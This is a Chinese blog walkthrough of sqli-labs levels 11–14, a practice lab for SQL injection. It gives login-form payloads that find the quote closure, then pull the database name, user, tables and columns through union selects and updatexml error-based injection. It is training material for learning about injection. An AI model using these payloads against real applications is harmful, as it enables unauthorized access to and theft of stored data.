当前位置: 首页 > news >正文

sqli-labs 靶场 less-11~14 第十一关、第十二关、第十三关、第十四关详解:联合注入、错误注入

news 来源:原创 2025/5/4 1:52:45 
SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。

Less 11

SQLI DUMB SERIES-11

welcome dhakkan

判断注入点

尝试在用户名这个字段实施注入,且试出SQL语句闭合方式为单引号:
login attempt
同时输入正确的用户名就可以查看到数据,那么我们就只可以在这个uname位置直接注入。

uname=admin' -- &passwd=1

在这里插入图片描述

实施注入

获取数前数据库的数据名和用户名

uname=0' union select database(),user() from dual -- &passwd=1

logged in
获取当前数据库的表名:

uname=0' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() -- &passwd=1

successfully logged in
获取user表的列名:

uname=0' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' -- &passwd=1

获取用户名

Less 12

SQLI DUMB SERIES-12

通过输入判断出查询字符串的闭合方式为")
security
同样通过这一个点获取数据库名和用户名。

uname=0") union select database(),user() from dual -- &passwd=1

在这里插入图片描述

Less 13

SQLI DUMB SERIES-13

判断注入点

SQL语句错误,提示异常。

uname=0'&passwd=1

在这里插入图片描述
正常输入结果显示成功,不过没有任何提示内容。

uname=admin') -- &passwd=1

admin
如果是这样的话,那就只能通过错误信息来获取数据了,如下所示

uname=0') and updatexml(1,concat(user()),1) -- &passwd=1

localhost

实施注入

uname=0') and updatexml(1,concat('~',(database())),1) -- &passwd=1

welcome login attempt
获取当前数据库所有的表名

uname=0') and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) -- &passwd=1

failed
获取user表所有的列名

uname=0') and updatexml(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1) -- &passwd=1

123
到此注入成功

Less 14

SQLI DUMB SERIES-14

在这里插入图片描述

判断注入点

测试双引号报错。

uname=admin "&passwd=1

在这里插入图片描述
然后经测试采用双引号加注释符就可以验证登录成功。

uname=admin "-- &passwd=1

admin
但这样还不能获取数据,则判断这个注入方式为错误注入。
通过updatexml方法即可成功注入

uname=admin " and updatexml(1,user(),3)-- &passwd=1

在这里插入图片描述

实施注入

获取数据库名

uname=admin " and updatexml(1,concat('~',database()),3)-- &passwd=1

在这里插入图片描述

获取当前数据库所有的表名

uname=admin " and updatexml(1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3)-- &passwd=1

在这里插入图片描述
获取user表所有的列名

uname=admin " and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),3)-- &passwd=1

在这里插入图片描述

系列文章

  • sqli-labs 靶场闯关基础准备
  • sqli-labs 靶场 less-1、2、3、4第一关至第四关
  • sqli-labs 靶场 less-5、6 第五关和第六关
  • sqli-labs 靶场 less-7
  • sqli-labs 靶场 less-8、9、10

相关文章:

  • [word] word如何清除超链接 #媒体#笔记#知识分享
  • NSSCTF-Web题目5
  • Faiss assertion ‘err == cudaSuccess‘ failed in void faiss::gpu:runL2Norm()
  • LangChain开发【NL2SQL】应用
  • Web前端管理系统项目:深度解析与实现之道
  • ROS使用手柄/cmd_vel无输出
  • 【Anaconda】 anaconda常用命令总结
  • 德克萨斯大学奥斯汀分校自然语言处理硕士课程汉化版(第六周) - 预训练模型
  • Golang 避坑指南
  • 鸿蒙轻内核M核源码分析系列七 动态内存Dynamic Memory
  • 【算法篇】滑动窗口的最大值JavaScript版
  • @并行计算和分布式计算解决方案
  • uniapp使用webview内嵌H5的注意事项
  • 渗透测试之内核安全系列课程:Rootkit技术初探(一)
  • 朗思RPA,一款无需代码的自动化效率神器
  • 大数据之Hadoop的特点是什么?有什么优缺点?有哪些发行版本?
  • WDF驱动开发-电源策略(三)
  • 软件测试--Mysql快速入门
  • 芒果YOLOv10改进38:写作篇:一文了解YOLOv10如何打印FPS指标
  • 【C++进阶】深入STL之 栈与队列:数据结构探索之旅
  • 美国将于6月14日举行阅兵式,美媒报当天是特朗普生日
  • 人民日报评论员:把造福人民作为根本价值取向
  • 德雷克海峡发生6.4级地震,震源深度10千米
  • 准85后青海海北州副州长、州公安局局长李贤荣挂职临沂市副市长
  • 燕子矶:物流网络中的闪亮节点|劳动者的书信②
  • 王毅:妥协退缩只会让霸凌者得寸进尺